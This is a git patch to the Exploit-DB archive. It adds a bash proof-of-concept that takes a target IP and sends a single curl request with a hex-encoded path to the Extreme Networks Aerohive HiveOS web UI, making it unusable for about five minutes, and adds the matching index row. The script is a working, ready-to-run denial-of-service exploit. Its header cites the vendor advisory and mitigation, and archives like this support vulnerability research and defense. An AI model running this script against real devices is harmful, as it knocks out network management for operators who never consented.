From 262c9c3eb6d4de853193d11bc475a64e6bd7b092 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 9 May 2020 05:01:48 +0000 Subject: [PATCH] DB: 2020-05-09 1 changes to exploits/shellcodes Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC) --- exploits/hardware/dos/48441.sh | 69 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 70 insertions(+) create mode 100755 exploits/hardware/dos/48441.sh diff --git a/exploits/hardware/dos/48441.sh b/exploits/hardware/dos/48441.sh new file mode 100755 index 000000000..1f79f5da5 --- /dev/null +++ b/exploits/hardware/dos/48441.sh @@ -0,0 +1,69 @@ +# Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC) +# Exploit Author : LiquidWorm +# Date : 2020-05-06 +# Vendor: Extreme Networks +# Product web page: https://www.extremenetworks.com +# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf +# Affected version: <=11.x + +#!/bin/bash +# +# +# Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit +# +# +# Vendor: Extreme Networks +# Product web page: https://www.extremenetworks.com +# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf +# Affected version: <=11.x +# +# Summary: Aerohive HiveOS is the network operating system that powers +# all Aerohive access points, based on a feature-rich Cooperative Control +# architecture. HiveOS enables Aerohive devices to organize into groups, +# or 'hives', which allows functionality like fast roaming, user-based +# access control and fully stateful application-aware firewall policies, +# as well as additional security and RF networking features - all without +# the need for a centralized or dedicated controller. +# +# Desc: An unauthenticated malicious user can trigger a Denial of Service +# (DoS) attack when sending specific application layer packets towards the +# Aerohive NetConfig UI. This PoC exploit renders the application unusable +# for 305 seconds or 5 minutes with a single HTTP request using the action.php5 +# script calling the CliWindow function thru the _page parameter, denying +# access to the web server hive user interface. +# +# Vendor mitigation: +# CLI> no system web-server hive-ui enable +# +# Tested on: Hiawatha v9.6 +# +# +# Vulnerability discvered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5566 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php +# +# +# 05.12.2019 +# + +if [ "$#" -ne 1 ]; then + echo -ne "\nUsage: $0 [ipaddr]\n\n" + exit +fi + +IP=$1 + +SBYTES=`echo -e \ +"\x61\x63\x74\x69\x6f\x6e\x2e"\ +"\x70\x68\x70\x35\x3f\x5f\x70"\ +"\x61\x67\x65\x3d\x43\x6c\x69"\ +"\x57\x69\x6e\x64\x6f\x77\x26"\ +"\x5f\x61\x63\x74\x69\x6f\x6e"\ +"\x3d\x67\x65\x74\x26\x5f\x61"\ +"\x63\x74\x69\x6f\x6e\x54\x79"\ +"\x70\x65\x3d\x31"`##_000000251 + +curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ce1992889..34f4a6cc6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6731,6 +6731,7 @@ id,file,description,date,author,type,platform,port 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware, 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows, 48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows, +48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,